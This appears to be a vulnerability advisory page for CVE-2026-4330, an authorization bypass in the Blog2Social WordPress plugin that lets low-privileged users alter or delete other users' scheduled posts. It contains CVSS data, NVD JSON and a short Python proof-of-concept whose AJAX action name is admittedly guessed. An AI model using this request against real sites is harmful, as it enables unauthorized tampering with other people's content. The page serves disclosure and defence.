Security Vulnerability Report
中文
CVE-2026-4330 CVSS 4.3 MEDIUM

CVE-2026-4330

Published: 2026-04-08 08:16:24
Last Modified: 2026-04-24 18:15:29
Source: [email protected]

Description

The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to authorization bypass through user-controlled key in all versions up to, and including, 8.8.3. This is due to the plugin's AJAX handlers failing to validate that the user-supplied 'b2s_id' parameter belongs to the current user before performing UPDATE and DELETE operations. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify, reschedule, or delete other users' scheduled social media posts.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Blog2Social <= 8.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" attacker_cookie = "wordpress_logged_in_xxx=..." # The vulnerable parameter 'b2s_id' belonging to another user target_post_id = "12345" # Simulate the vulnerable AJAX action (Action name might vary based on specific functionality) data = { "action": "b2s_update_post", # Example action, derived from context "b2s_id": target_post_id, "b2s_modify_data": "MALICIOUS_CONTENT" } headers = { "Cookie": attacker_cookie, "Content-Type": "application/x-www-form-urlencoded" } response = requests.post(target_url, data=data, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Post modified.") else: print("[-] Failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4330", "sourceIdentifier": "[email protected]", "published": "2026-04-08T08:16:23.733", "lastModified": "2026-04-24T18:15:28.940", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to authorization bypass through user-controlled key in all versions up to, and including, 8.8.3. This is due to the plugin's AJAX handlers failing to validate that the user-supplied 'b2s_id' parameter belongs to the current user before performing UPDATE and DELETE operations. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify, reschedule, or delete other users' scheduled social media posts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Ajax/Post.php#L2178", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Ajax/Post.php#L2183", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Ajax/Post.php#L2273", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Ajax/Post.php#L2322", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/B2S/Post/Tools.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/B2S/Ship/Save.php#L190", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.8.2/includes/Loader.php#L2202", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php#L2178", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php#L2183", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php#L2273", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php#L2322", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/B2S/Post/Tools.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/B2S/Ship/Save.php#L190", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Loader.php#L2202", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3494550/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f3eec9c6-fef9-4d6e-8328-51efb997c99c?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.